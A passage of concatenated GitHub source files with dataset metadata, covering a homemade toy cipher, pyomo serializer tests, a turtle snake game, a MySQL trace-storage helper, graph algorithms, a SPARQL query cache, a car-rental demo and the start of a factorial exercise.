Metodos_refuerzo:\n\n def keygen(self, key):\n h = hashlib.sha256()\n h.update(key.encode())\n return base64.a85encode(h.digest()).decode()[:24]\n\n def rail_pattern(self, n):\n r = list(range(n))\n return cycle(r + r[-2:0:-1])\n\n def encode(self, plaintext, rails):\n p = self.rail_pattern(rails)\n return ''.join(sorted(plaintext, key=lambda i: next(p)))\n\n def decode(self, ciphertext, rails):\n p = self.rail_pattern(rails)\n indexes = sorted(range(len(ciphertext)), key=lambda i: next(p))\n result = [''] * len(ciphertext)\n for i, c in zip(indexes, ciphertext):\n result[i] = c\n return ''.join(result)\n\n######\n\n def text2number(self, string__, x):\n if ord(string__[-1]) % 2 == 1:\n string__ = string__[::-1]\n return (int.from_bytes(string__.encode(), \"little\") % x) + 2\n\n def modEncrypt(self, msg, key):\n return \"\".join([chr((ord(msg[i]) + ord(key[i % len(key)])) % 256) for i in range(len(msg))])\n\n def modDecrypt(self, cip, key):\n return \"\".join([chr((ord(cip[i]) + (256 - ord(key[i % len(key)]))) % 256) for i in range(len(cip))])\n\n######\n\n def xor(self, s, k):\n return \"\".join([chr(ord(f) ^ ord(k[i % len(k)])) for i, f in enumerate(s)])\n\n######\n def split(self, seq):\n n = 12 # block length is 12\n datas = []\n while seq:\n datas.append(seq[:n])\n seq = seq[n:]\n return datas\n\n def pad(self, e):\n if len(e) == 12:\n return e\n else:\n return e + (chr(0) * (12 - len(e)))\n ######\n\n def encrypt(self, string, key):\n string = chr(len(string)) + string\n string = self.modEncrypt(string, key)\n ciphertext = \"\"\n odometer = [1, 2, 3, 4]\n blocks = self.split(string)\n key1 = key[12:24]\n key = key[:12]\n for block in blocks:\n block = self.pad(block)\n if odometer[0] == 1:\n for i in range(4):\n block = self.modEncrypt(block, key1)\n block = self.xor(block, key)\n elif odometer[1] == 1:\n for i in range(3):\n block = self.xor(block, key)\n block = self.modEncrypt(block, key)\n elif odometer[2] == 1:\n for i in range(2):\n block = self.xor(block, key1)\n block = self.modEncrypt(block, key1)\n elif odometer[3] == 1:\n block = self.modEncrypt(block, key1)\n block = self.xor(block, key1)\n odometer = odometer[1:] + [odometer[0]]\n ciphertext = ciphertext + block\n ciphertext = self.encode(ciphertext, self.text2number(key, 12))\n return self.xor(ciphertext, chr(self.text2number(key1, 127)) + chr(self.text2number(key, 127)))\n\n def decrypt(self, cipher, key):\n string = \"\"\n odometer = [1, 2, 3, 4]\n key1 = key[12:24]\n key = key[:12]\n cipher = self.xor(cipher, chr(self.text2number(key1, 127)) + chr(self.text2number(key, 127)))\n cipher = self.decode(cipher, self.text2number(key, 12))\n blocks = self.split(cipher)\n for block in blocks:\n if odometer[1] == 1:\n for i in range(3):\n block = self.modDecrypt(block, key)\n block = self.xor(block, key)\n elif odometer[0] == 1:\n for i in range(4):\n block = self.xor(block, key)\n block = self.modDecrypt(block, key1)\n elif odometer[3] == 1:\n block = self.xor(block, key1)\n block = self.modDecrypt(block, key1)\n elif odometer[2] == 1:\n for i in range(2):\n block = self.modDecrypt(block, key1)\n block = self.xor(block, key1)\n odometer = odometer[1:] + [odometer[0]]\n string = string + block\n final = list(self.modDecrypt(string, key + key1).rstrip())\n char = ord(final.pop(0))\n return 
\"\".join(final[:char])\n\n\n\n","repo_name":"andree-ro/BaseDatosEnsoluna","sub_path":"encrypt.py","file_name":"encrypt.py","file_ext":"py","file_size_in_byte":4999,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"8851462778","text":"import unittest\nimport os\n\nfrom pyomo.environ import *\nfrom model_serializer import to_json, from_json, StoreSpec\nimport shutil\nimport pytest\nimport tempfile\n\n__author__ = \"John Eslick\"\n\ndir_path = os.path.dirname(os.path.abspath(__file__))\njson_path = os.path.join(dir_path, \"jsonfiles/\")\nif not(os.path.exists(json_path)):\n print('Directory for automatically generated files ' +\n json_path + ' does not exist. We will create it')\n os.makedirs(json_path)\n\n\nclass TestModelSerialize(unittest.TestCase):\n\n @classmethod\n def setUpClass(cls):\n # cls.dirname = tempfile.mkdtemp() #Change this directory for it to point to the place where we store the json files\n cls.dirname = json_path\n cls.fname = os.path.join(cls.dirname, \"crAzYStuff1010202030.json\")\n\n # Uncomment the lines below if you want the json files to be deleted.\n # @classmethod\n # def tearDownClass(cls):\n # shutil.rmtree(cls.dirname)\n\n # def tearDown(self):\n # try:\n # os.remove(self.fname)\n # except:\n # pass\n\n def setup_model01(self):\n model = ConcreteModel()\n model.b = Block([1,2,3])\n a = model.b[1].a = Var(bounds=(-100, 100), initialize=2)\n b = model.b[1].b = Var(bounds=(-100, 100), initialize=20)\n model.b[1].c = Constraint(expr=b==10*a)\n a.fix(2)\n return model\n\n def setup_model02(self):\n model = ConcreteModel()\n a = model.a = Param(default=1, mutable=True)\n b = model.b = Param(default=2, mutable=True)\n c = model.c = Param(initialize=4)\n x = model.x = Var([1,2], initialize={1:1.5, 2:2.5}, bounds=(-10,10))\n model.f = Objective(expr=(x[1] - a)**2 + (x[2] - b)**2)\n model.g = Constraint(expr=x[1] + x[2] - c >= 0)\n model.dual = Suffix(direction=Suffix.IMPORT)\n model.ipopt_zL_out = Suffix(direction=Suffix.IMPORT)\n model.ipopt_zU_out = Suffix(direction=Suffix.IMPORT)\n return model\n\n @pytest.mark.unit\n def test01(self):\n \"\"\"\n Simple test of load save json\n \"\"\"\n model = self.setup_model01()\n a = model.b[1].a\n b = model.b[1].b\n to_json(model, fname=self.fname, human_read=True)\n # change variable values\n a.value = 0.11\n b.value = 0.11\n a.unfix()\n model.b[1].deactivate()\n b.setlb(2)\n b.setub(4)\n # reload values\n from_json(model, fname=self.fname)\n #make sure they are right\n assert(a.fixed)\n assert(model.b[1].active)\n assert(abs(value(b) - 20) < 1e-4)\n assert(abs(value(a) - 2) < 1e-4)\n assert(abs(b.lb - -100) < 1e-4)\n assert(abs(b.ub - 100) < 1e-4)\n\n @pytest.mark.unit\n def test02(self):\n \"\"\"Test with suffixes\"\"\"\n model = self.setup_model02()\n x = model.x\n model.dual[model.g] = 1\n model.ipopt_zL_out[x[1]] = 0\n model.ipopt_zL_out[x[2]] = 0\n model.ipopt_zU_out[x[1]] = 0\n model.ipopt_zU_out[x[2]] = 0\n to_json(model, fname=self.fname, human_read=True)\n model.x[1].value = 10\n model.x[2].value = 10\n model.dual[model.g] = 10\n model.ipopt_zL_out[x[1]] = 10\n model.ipopt_zL_out[x[2]] = 10\n model.ipopt_zU_out[x[1]] = 10\n model.ipopt_zU_out[x[2]] = 10\n from_json(model, fname=self.fname)\n assert(abs(value(x[1]) - 1.5) < 1e-5)\n assert(abs(value(x[2]) - 2.5) < 1e-5)\n assert(abs(model.dual[model.g] - 1) < 1e-5)\n assert(abs(model.ipopt_zL_out[x[1]]) < 1e-5)\n assert(abs(model.ipopt_zL_out[x[2]]) < 1e-5)\n assert(abs(model.ipopt_zU_out[x[1]]) < 1e-5)\n 
assert(abs(model.ipopt_zU_out[x[2]]) < 1e-5)\n\n @pytest.mark.unit\n def test03(self):\n \"\"\"\n This tests a StoreSpec object meant for initialization. It reloads\n the saved state of variable values and whether they are fixed or\n unfixed but it only loads values for variables that were originally\n fixed. It's use would be in doing initialization that changes which\n variables are fixed and does whatever, but when the original state is\n reloaded only the original values for fixed variables are reloaded. You\n basically end up with the same problem, just a different initial guess.\n \"\"\"\n model = self.setup_model02()\n x = model.x\n x[1].fix(1)\n wts = StoreSpec.value_isfixed(only_fixed=True)\n to_json(model, fname=self.fname, human_read=True, wts=wts)\n x[1].unfix()\n x[1].value = 2\n x[2].value = 10\n from_json(model, fname=self.fname, wts=wts)\n assert(x[1].fixed)\n assert(abs(value(x[1]) - 1) < 1e-5)\n assert(abs(value(x[2]) - 10) < 1e-5)\n\n @pytest.mark.unit\n def test04(self):\n \"\"\"\n Like test03, but this StoreSpec also saves/loads active/deactivated\n component attribute and parameter values.\n \"\"\"\n model = self.setup_model02()\n x = model.x\n x[1].fix(1)\n wts = StoreSpec.value_isfixed_isactive(only_fixed=True)\n to_json(model, fname=self.fname, human_read=True, wts=wts)\n x[1].unfix()\n x[1].value = 2\n x[2].value = 10\n model.g.deactivate()\n from_json(model, fname=self.fname, wts=wts)\n assert(x[1].fixed)\n assert(abs(value(x[1]) - 1) < 1e-5)\n assert(abs(value(x[2]) - 10) < 1e-5)\n assert(model.g.active)\n\n @pytest.mark.unit\n def test05(self):\n \"\"\"Try just saving values\"\"\"\n model = self.setup_model02()\n model.x[1].value = 1\n wts = StoreSpec.value()\n to_json(model, fname=self.fname, human_read=True, wts=wts)\n model.g.deactivate()\n model.x[1].setlb(-4)\n model.x[1].value = 3\n model.x[2].value = 6\n from_json(model, fname=self.fname, wts=wts)\n assert(abs(value(model.x[1]) - 1) < 1e-5)\n assert(abs(model.x[1].lb + 4) < 1e-5)\n assert(abs(value(model.x[2]) - 2.5) < 1e-5)\n assert(not model.g.active)\n\n @pytest.mark.unit\n def test06(self):\n \"\"\"Try just saving bounds\"\"\"\n model = self.setup_model02()\n model.x[1].value = 1\n wts = StoreSpec.bound()\n to_json(model, fname=self.fname, human_read=True, wts=wts)\n model.g.deactivate()\n model.x[1].setlb(-4)\n model.x[1].value = 3\n model.x[2].value = 6\n from_json(model, fname=self.fname, wts=wts)\n assert(abs(value(model.x[1]) - 3) < 1e-5)\n assert(abs(model.x[1].lb + 10) < 1e-5)\n assert(abs(value(model.x[2]) - 6) < 1e-5)\n assert(not model.g.active)\n\n @pytest.mark.unit\n def test07(self):\n \"\"\"Try just saving just if fixed\"\"\"\n model = self.setup_model02()\n model.x[1].fix(1)\n wts = StoreSpec.isfixed()\n to_json(model, fname=self.fname, human_read=True, wts=wts)\n model.g.deactivate()\n model.x[1].setlb(-4)\n model.x[1].unfix()\n model.x[2].fix(6)\n from_json(model, fname=self.fname, wts=wts)\n assert(abs(value(model.x[1]) - 1) < 1e-5)\n assert(abs(model.x[1].lb + 4) < 1e-5)\n assert(abs(value(model.x[2]) - 6) < 1e-5)\n assert(model.x[1].fixed)\n assert(not model.x[2].fixed)\n assert(not model.g.active)\n\n @pytest.mark.unit\n def test08(self):\n \"\"\"Try just saving suffixes\"\"\"\n model = self.setup_model02()\n model.x[1].fix(1)\n\n model.dual[model.g] = 1\n model.ipopt_zL_out[model.x[1]] = 1\n model.ipopt_zL_out[model.x[2]] = 1\n model.ipopt_zU_out[model.x[1]] = 1\n model.ipopt_zU_out[model.x[2]] = 1\n\n to_json(model, fname=self.fname, wts=StoreSpec.suffix())\n\n 
model.dual[model.g] = 10\n model.ipopt_zL_out[model.x[1]] = 10\n model.ipopt_zL_out[model.x[2]] = 10\n model.ipopt_zU_out[model.x[1]] = 10\n model.ipopt_zU_out[model.x[2]] = 10\n model.g.deactivate()\n model.x[1].setlb(-4)\n model.x[1].unfix()\n model.x[2].fix(6)\n\n from_json(model, fname=self.fname, wts=StoreSpec.suffix())\n assert(abs(value(model.x[1]) - 1) < 1e-5)\n assert(abs(value(model.x[2]) - 6) < 1e-5)\n assert(not model.x[1].fixed)\n assert(model.x[2].fixed)\n assert(not model.g.active)\n assert(abs(model.dual[model.g] - 1) < 1e-5)\n assert(abs(model.ipopt_zL_out[model.x[1]] - 1) < 1e-5)\n assert(abs(model.ipopt_zL_out[model.x[2]] - 1) < 1e-5)\n assert(abs(model.ipopt_zU_out[model.x[1]] - 1) < 1e-5)\n assert(abs(model.ipopt_zU_out[model.x[2]] - 1) < 1e-5)\n assert(abs(model.x[1].lb + 4) < 1e-5)\n\n @pytest.mark.unit\n def test09(self):\n \"\"\"Try just saving suffixes, and suffix filter\"\"\"\n model = self.setup_model02()\n\n model.dual[model.g] = 1\n model.ipopt_zL_out[model.x[1]] = 1\n model.ipopt_zL_out[model.x[2]] = 1\n model.ipopt_zU_out[model.x[1]] = 1\n model.ipopt_zU_out[model.x[2]] = 1\n\n wts = StoreSpec.suffix(suffix_filter=(\"dual\",))\n to_json(model, fname=self.fname, wts=wts)\n\n model.dual[model.g] = 10\n model.ipopt_zL_out[model.x[1]] = 10\n model.ipopt_zL_out[model.x[2]] = 10\n model.ipopt_zU_out[model.x[1]] = 10\n model.ipopt_zU_out[model.x[2]] = 10\n\n from_json(model, fname=self.fname, wts=wts)\n assert(abs(model.dual[model.g] - 1) < 1e-5)\n assert(abs(model.ipopt_zL_out[model.x[1]] - 10) < 1e-5)\n assert(abs(model.ipopt_zL_out[model.x[2]] - 10) < 1e-5)\n assert(abs(model.ipopt_zU_out[model.x[1]] - 10) < 1e-5)\n assert(abs(model.ipopt_zU_out[model.x[2]] - 10) < 1e-5)\n\n @pytest.mark.unit\n def test10(self):\n \"\"\"Try just saving suffixes, and suffix filter only on write\"\"\"\n model = self.setup_model02()\n\n model.dual[model.g] = 1\n model.ipopt_zL_out[model.x[1]] = 1\n model.ipopt_zL_out[model.x[2]] = 1\n model.ipopt_zU_out[model.x[1]] = 1\n model.ipopt_zU_out[model.x[2]] = 1\n\n wts = StoreSpec.suffix(suffix_filter=(\"dual\",))\n to_json(model, fname=self.fname, wts=wts)\n\n model.dual[model.g] = 10\n model.ipopt_zL_out[model.x[1]] = 10\n model.ipopt_zL_out[model.x[2]] = 10\n model.ipopt_zU_out[model.x[1]] = 10\n model.ipopt_zU_out[model.x[2]] = 10\n\n from_json(model, fname=self.fname, wts=StoreSpec.suffix())\n assert(abs(model.dual[model.g] - 1) < 1e-5)\n assert(abs(model.ipopt_zL_out[model.x[1]] - 10) < 1e-5)\n assert(abs(model.ipopt_zL_out[model.x[2]] - 10) < 1e-5)\n assert(abs(model.ipopt_zU_out[model.x[1]] - 10) < 1e-5)\n assert(abs(model.ipopt_zU_out[model.x[2]] - 10) < 1e-5)\n\n @pytest.mark.unit\n def test11(self):\n \"\"\"Try just saving suffixes, and suffix filter only on read\"\"\"\n model = self.setup_model02()\n\n model.dual[model.g] = 1\n model.ipopt_zL_out[model.x[1]] = 1\n model.ipopt_zL_out[model.x[2]] = 1\n model.ipopt_zU_out[model.x[1]] = 1\n model.ipopt_zU_out[model.x[2]] = 1\n\n\n to_json(model, fname=self.fname, wts=StoreSpec.suffix())\n\n model.dual[model.g] = 10\n model.ipopt_zL_out[model.x[1]] = 10\n model.ipopt_zL_out[model.x[2]] = 10\n model.ipopt_zU_out[model.x[1]] = 10\n model.ipopt_zU_out[model.x[2]] = 10\n\n wts = StoreSpec.suffix(suffix_filter=(\"dual\",))\n from_json(model, fname=self.fname, wts=wts)\n assert(abs(model.dual[model.g] - 1) < 1e-5)\n assert(abs(model.ipopt_zL_out[model.x[1]] - 10) < 1e-5)\n assert(abs(model.ipopt_zL_out[model.x[2]] - 10) < 1e-5)\n assert(abs(model.ipopt_zU_out[model.x[1]] - 10) < 1e-5)\n 
assert(abs(model.ipopt_zU_out[model.x[2]] - 10) < 1e-5)\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"bernalde/dsda-gdp","sub_path":"misc/util/test_model_serializer.py","file_name":"test_model_serializer.py","file_ext":"py","file_size_in_byte":11883,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"60"} {"seq_id":"30860431984","text":"from turtle import Turtle, Screen\nimport time\nimport random\nscreen = Screen()\nscreen.setup(width= 600, height= 600)\nscreen.bgcolor((0,0,0))\nscreen.title(\"Snake Game\")\nscreen.tracer(0)\npieces_of_snake = []\nfor i in range(-40,1,20):\n snake = Turtle()\n snake.penup()\n snake.shape(\"square\")\n snake.color(\"white\")\n snake.goto(x=i, y=0)\n pieces_of_snake.append(snake)\n print(snake.position())\nscreen.update()\nprint(\"===========\")\n\ncount_of_bubble = 0\ndef left():\n pieces_of_snake[len(pieces_of_snake)-1].left(90)\n # pieces_of_snake[len(pieces_of_snake)-1].forward(20)\n forward()\n screen.update()\n\n\ndef right():\n pieces_of_snake[len(pieces_of_snake)-1].right(90)\n forward()\n # pieces_of_snake[len(pieces_of_snake)-1].forward(20)\n screen.update()\n\ndef add_tail():\n new_snake = Turtle()\n new_snake.shape(\"square\")\n new_snake.color(\"white\")\n pieces_of_snake.append(new_snake)\n\ndef forward():\n # print(\"Forward\")\n for i in range(0,len(pieces_of_snake)):\n print(len(pieces_of_snake))\n if i+1 <= len(pieces_of_snake) -1:\n position = pieces_of_snake[i+1].position()\n pieces_of_snake[i].goto(position)\n else:\n pieces_of_snake[i].forward(20)\n screen.update()\n\n\ndef is_out_of_bounds():\n head_position = pieces_of_snake[len(pieces_of_snake)-1].position()\n if head_position[0] < -290 or head_position[1] < -290:\n return True\n elif head_position[0] > 290 or head_position[1] > 290:\n return True\n else:\n return False\n\ndef goal_achieved(bubble):\n # returns True once the snake's head reaches the bubble\n head_position = pieces_of_snake[len(pieces_of_snake)-1].position()\n if head_position == bubble.position():\n bubble.clear()\n return True\n else:\n return False\n\ndef generate_a_bubble():\n bubble = (random.randint(-280,280),random.randint(-280,280))\n objective = Turtle()\n objective.shape(\"circle\")\n objective.color(\"red\")\n objective.penup()\n objective.goto(bubble)\n return objective\n# screen.onkey(fun=forward, key=\"Up\")\nscreen.listen()\ngame_is_on = True\n\nwhile game_is_on:\n screen.update()\n time.sleep(0.1)\n forward()\n if count_of_bubble == 0:\n bubble = generate_a_bubble()\n \n while not goal_achieved(bubble) and not is_out_of_bounds():\n screen.onkey(fun=left, key=\"Left\")\n screen.onkey(fun= right, key=\"Right\")\n time.sleep(0.1)\n forward()\n screen.onkey(fun=left, key=\"Left\")\n screen.onkey(fun= right, key=\"Right\")\n # for pos in pieces_of_snake:\n # print(pos.position())\n \n if is_out_of_bounds():\n game_is_on = False\n screen.update()\n # break\n \n\nscreen.exitonclick()\n","repo_name":"SangeethKumarPG/Python-Exercises","sub_path":"snake_game/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":2707,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} {"seq_id":"35235539519","text":"import mysql.connector\n\nclass DB:\n\n database = mysql.connector.connect(host=\"localhost\", user=\"root\", password=\"gpsAT\", database=\"gpsAT\") # Database connection information\n cursor = database.cursor() # Connection to the database\n\n def init(self):\n \"\"\"Initialisation of the database\"\"\"\n\n 
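# build the schema up front; CREATE TABLE IF NOT EXISTS makes repeated calls safe\n 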
self.createTables()\n\n def createTables(self):\n \"\"\"Creation of the database tables\"\"\"\n\n self.cursor.execute(\"\"\"\n CREATE TABLE IF NOT EXISTS Trace (\n idTrace int(6) NOT NULL AUTO_INCREMENT,\n nomTrace varchar(100) DEFAULT NULL,\n PRIMARY KEY(idTrace)\n );\n \"\"\")\n\n self.cursor.execute(\"\"\"\n CREATE TABLE IF NOT EXISTS Data (\n idData int(6) NOT NULL AUTO_INCREMENT,\n idTrace int(6) DEFAULT NULL,\n latitude float(20) DEFAULT NULL,\n longitude float(20) DEFAULT NULL,\n PRIMARY KEY(idData),\n FOREIGN KEY(idTrace) REFERENCES Trace(idTrace)\n );\n \"\"\")\n\n def insertTrace(self,nameTrace):\n \"\"\"Insert a trace in the database\"\"\"\n\n sql = \"\"\"INSERT INTO Trace(nomTrace) \n VALUES (%s);\"\"\"\n adr=(nameTrace,)\n\n self.cursor.execute(sql,adr)\n\n self.database.commit()\n\n def insertData(self,idTrace,latitude,longitude):\n \"\"\"Insert trace data into the database\"\"\"\n\n sql = \"\"\"INSERT INTO Data(idTrace,latitude,longitude) \n VALUES (%s,%s,%s);\"\"\"\n adr=(idTrace,latitude,longitude)\n\n self.cursor.execute(sql,adr)\n\n self.database.commit()\n\n def selectTraceWithName(self,nameTrace):\n \"\"\"Select a trace by its name\"\"\"\n\n sql = \"\"\"SELECT idTrace \n FROM Trace\n WHERE nomTrace=%s;\"\"\"\n adr = (nameTrace,)\n\n self.cursor.execute(sql, adr)\n\n return self.cursor.fetchone()[0] # Int\n\n def selectDataWithIdTrace(self,idTrace):\n \"\"\"Select trace data with its id\"\"\"\n \n sql = \"\"\"SELECT Data.latitude,Data.longitude \n FROM Data\n INNER JOIN Trace \n ON Trace.idTrace = Data.idTrace\n WHERE Trace.idTrace=%s\n ORDER BY Data.idData;\"\"\"\n adr = (idTrace,)\n\n self.cursor.execute(sql, adr)\n\n return self.cursor.fetchall() # List of tuple\n\n def selectAllIdTrace(self):\n \"\"\"Select all trace ids\"\"\"\n\n self.cursor.execute(\"\"\"\n SELECT idTrace\n FROM Trace \n ;\"\"\"\n )\n return self.cursor.fetchall() # List of tuple\n\n def selectAllNameTrace(self):\n \"\"\"Select all trace names\"\"\"\n\n self.cursor.execute(\"\"\"\n SELECT nomTrace\n FROM Trace \n ;\"\"\"\n )\n return self.cursor.fetchall() # List of tuple\n\n def close(self):\n \"\"\"Close interactions with the database\"\"\"\n\n self.database.close()\n","repo_name":"ayoubbibo/Projet_ASAIoT","sub_path":"model/interactionDB.py","file_name":"interactionDB.py","file_ext":"py","file_size_in_byte":2739,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} {"seq_id":"73795194431","text":"with open('day1_1inputs.txt', 'r') as inputs:\n inc_count = 0\n data = [int(current) for current in inputs]\n previous = data[0] + data[1] + data[2]\n for i in range(1, len(data) - 2):\n temp = data[i] + data[i + 1] + data[i + 2]\n if temp > previous:\n inc_count += 1\n previous = temp\n\n print(inc_count)","repo_name":"ma-henderson/advent_of_code_2021","sub_path":"day1_2.py","file_name":"day1_2.py","file_ext":"py","file_size_in_byte":345,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} {"seq_id":"23489495804","text":"import pylab as plt\n\n\ndef show(mat, save_loc=False):\n (rows, cols) = mat.shape\n plt.imshow(mat, cmap='hot', aspect=(cols/rows))\n if save_loc:\n plt.savefig(save_loc)\n else:\n plt.show()\n","repo_name":"FunkyQChicken/cogs-final-project-perceptron","sub_path":"plot.py","file_name":"plot.py","file_ext":"py","file_size_in_byte":210,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} {"seq_id":"44402414006","text":"from copy import 
deepcopy\n\nclass Edge:\n def __init__(self, origin, dest, weight):\n self.origin = origin\n self.dest = dest\n self.weight = weight\n\nclass Graph:\n def __init__(self, filename, flag):\n \"\"\"\n Graph constructor\n You will implement your graph here either using adjacency list or adjacency matrix\n True flag -> directed graph, False flag -> undirected graph \n filename will be the .txt file from which you will be loading your graph\n Format of .txt file is as given in the manual\n Construct this class as you deem fit \n \"\"\"\n self.graph = dict()\n is_directed = flag\n\n\n # reading the lines of the file\n file = open(filename, 'r')\n lines = file.readlines()\n lines = lines[2:] # the first two lines are not needed for AL Implementation\n\n for line in lines:\n # the format of a line is S E W, W can be multichar\n start = line[0]\n end = line[2]\n weight = int(line[4:-1])\n\n self.add_edge(start, end, weight, is_directed)\n \n def add_edge(self, start, end, weight, flag):\n \"\"\"\n inserts edge connecting start and end with weight to the graph\n does not require a return value \n \"\"\"\n\n # if the graph is undirected, add two edges to the graph, otherwise add one\n if flag:\n new_edge = Edge(start, end, weight)\n \n # if the vertex exists in the dict, \n # append to its list of edges, otherwise create the list with the new edge\n\n if start in self.graph: \n self.graph[start].append(new_edge)\n return \n \n self.graph[start] = [new_edge]\n return\n \n self.add_edge(start, end, weight, True)\n self.add_edge(end, start, weight, True)\n \n \n return\n \n def display(self):\n \"\"\"\n displays the graph in a certain format (given in Manual)\n returns a string \n \"\"\"\n result = []\n\n for _ , edges in sorted(self.graph.items()):\n for edge in edges:\n result += [(f\"({edge.origin},{edge.dest},{edge.weight})\")]\n\n result.sort()\n result = \" \".join(result)\n return result\n\n def dfs(self, start, end, visited):\n \n if start == end:\n return True\n\n if start in visited:\n return False\n \n visited.append(start)\n\n for edge in self.graph[start]:\n result = self.dfs(edge.dest, end, visited)\n\n if result:\n return True\n \n return False\n\n def reachable(self, start, end):\n \"\"\"\n determines if node end is reachable by node start\n returns a boolean\n \"\"\"\n\n if not start in self.graph:\n return False\n \n\n return self.dfs(start, end, [])\n\n \n\n def dijkstra(self, start, end):\n \"\"\"\n determines shortest path between start and end\n returns an int\n \"\"\"\n\n if not self.reachable(start, end):\n return -1\n\n # make a list of unvisited vertices\n unvisited_vertex = [vertex for vertex in self.graph]\n\n # make a list of visited vertices\n visited_vertex = []\n\n # make a distance table to store distances\n distance_table = {vertex : float(\"inf\") for vertex in self.graph}\n\n # set the distance from the starting node = 0\n distance_table[start] = 0\n\n unvisited_vertex.remove(start)\n\n for edge in self.graph[start]:\n # print(f'{edge = }')\n if edge.weight < distance_table[edge.dest]:\n distance_table[edge.dest] = edge.weight\n\n while unvisited_vertex:\n # find the unvisited vertex with the smallest distance\n # and visit it, relaxing its outgoing edges\n\n temp_list = list(distance_table.items())\n temp_list.sort(key= lambda i:i[1])\n\n 
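# scan the sorted distances for the nearest vertex that has not been visited yet\n 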
next_vertex = None\n\n for vertex, _ in temp_list:\n if vertex in unvisited_vertex:\n next_vertex = vertex\n break\n\n # print(f'{next_vertex = }')\n\n own_dist = distance_table[next_vertex]\n\n for edge in self.graph[next_vertex]:\n if own_dist + edge.weight < distance_table[edge.dest]:\n distance_table[edge.dest] = own_dist + edge.weight\n\n unvisited_vertex.remove(next_vertex)\n\n \n\n # print(f'{temp_list = }')\n # print(f'{unvisited_vertex = }')\n\n return distance_table[end]\n\n \n def topo_sort(self):\n \"\"\"\n sorts the graph using the toposort algorithm\n returns a string. Format: ABCDEF\n \"\"\"\n\n # compute the in-degree of each node\n # choose the vertex with in = 0 and put it in the sorted sequence\n # remove in = 0 node and recompute in degree\n\n res = []\n temp = []\n\n tree_copy = deepcopy(self.graph)\n\n nodes = {key : 0 for key in tree_copy}\n\n for node in self.graph:\n for edge in self.graph[node]:\n if edge.dest in nodes:\n nodes[edge.dest] += 1\n else:\n nodes[edge.dest] = 1\n\n \n for key, val in nodes.items():\n if val == 0:\n temp.append(key)\n\n for key in temp:\n nodes.pop(key)\n\n while temp:\n \n node = temp.pop(0)\n res.append(node)\n \n if node in self.graph:\n for edge in self.graph[node]:\n if edge.dest in nodes:\n nodes[edge.dest] -= 1\n\n for key, val in nodes.items():\n if val == 0:\n temp.append(key)\n\n for key in temp:\n if key in nodes:\n nodes.pop(key) \n\n\n\n return \"\".join(res)\n \n\n\n \n\nif __name__ == \"__main__\":\n\n # You can make your own graph to test here\n\n my_graph = Graph(\"graph1.txt\", True)\n\n # print(my_graph.topo_sort())\n # print(my_graph.graph)\n\n print(my_graph.topo_sort())\n\n \n\n pass\n\n# main()","repo_name":"soomro-abd/Data-Structures","sub_path":"Assignment 5/Graph.py","file_name":"Graph.py","file_ext":"py","file_size_in_byte":6568,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"10077941290","text":"import shelve\nfrom SPARQLWrapper.SPARQLExceptions import QueryBadFormed, EndPointNotFound, EndPointInternalError\nimport appdirs\nimport os\nimport errno\n\n# Not sure if complete list of exceptions that can be thrown\n# When query goes bad\n_catch_exceptions = (\n QueryBadFormed, EndPointNotFound, EndPointInternalError\n)\n\ndb_dir = appdirs.user_cache_dir(appname='synbiohub_adapter')\ndb_file = os.path.join(db_dir, 'queries.db')\n\ntry:\n os.makedirs(db_dir)\nexcept OSError as e:\n if e.errno != errno.EEXIST:\n # Directory does not exists, something else went wrong\n raise\n else:\n # Directory already exists, ignore error\n pass\n\n\ndef wrap_query_fn(fn, db_file_path=None):\n if db_file_path is None:\n db_file_path = db_file\n\n def wrapped_fn(*args):\n # Just join the args into one string as the query key\n q_key = \", \".join((str(x) for x in args))\n\n try:\n result = fn(*args)\n # Run the query function then cache the results\n with shelve.open(db_file_path) as db:\n db[q_key] = result\n except _catch_exceptions as e:\n\n # Query failed, try to load the results from the cache\n import sys\n sys.stderr.write('Query failed, using fallback cache: {}\\n'.format(e))\n\n try:\n with shelve.open(db_file_path) as db:\n result = db[q_key]\n except Exception:\n # If fail to get cached value, re-raise the original exception instead.\n raise e\n\n return result\n\n return 
wrapped_fn\n","repo_name":"SD2E/synbiohub_adapter","sub_path":"synbiohub_adapter/cache_query.py","file_name":"cache_query.py","file_ext":"py","file_size_in_byte":1604,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"60"} +{"seq_id":"33737605036","text":"import json\n\nfrom car import Car\nfrom client import Client\nfrom rental import Rental\nfrom system import CarSystem\n\n\ndef quick_client_status(cl):\n print(f\"{cl.name} has rented {len(cl.cars)} cars.\")\n print(f\"{cl.name} balance: {cl.money}\\n\")\n\n\nwith open('cars.json') as json_cars:\n cars = json.load(json_cars)\n\nsystem = CarSystem([Car.from_dict(car) for car in cars])\nsystem.list_available_cars()\n\n# client_1\nHristo = Client('Hristo', 8000)\nHristo_rental1 = Rental('CB7628BA', hours=8, days=2)\nHristo_rental2 = Rental('A2277TA', weeks=2)\nHristo_rental3 = Rental('CT7777TT', days=1)\nHristo_rental4 = Rental('A2277TA', hours=5, days=3)\nsystem.rent([Hristo_rental1, Hristo_rental2, Hristo_rental3, Hristo_rental4], Hristo)\nquick_client_status(Hristo)\n\n# client_2\nIvan = Client('Ivan', 5000)\nIvan_rental1 = Rental('PB2924TC', hours=10)\nIvan_rental2 = Rental('PB6797KM', days=8)\nIvan_rental3 = Rental('PB7781HA', weeks=2)\nIvan_rental4 = Rental('PB3407HH', hours=6)\nsystem.rent(\n [Ivan_rental1, Ivan_rental2, Ivan_rental3, Ivan_rental4],\n Ivan\n)\nquick_client_status(Ivan)\n","repo_name":"pasat170/car-oop","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1080,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"34967696145","text":"print(\"Challenge 26: Write a Python program to find the number of zeros at the end of a factorial of a given positive number.\")\n\nimport math\n\nnum = 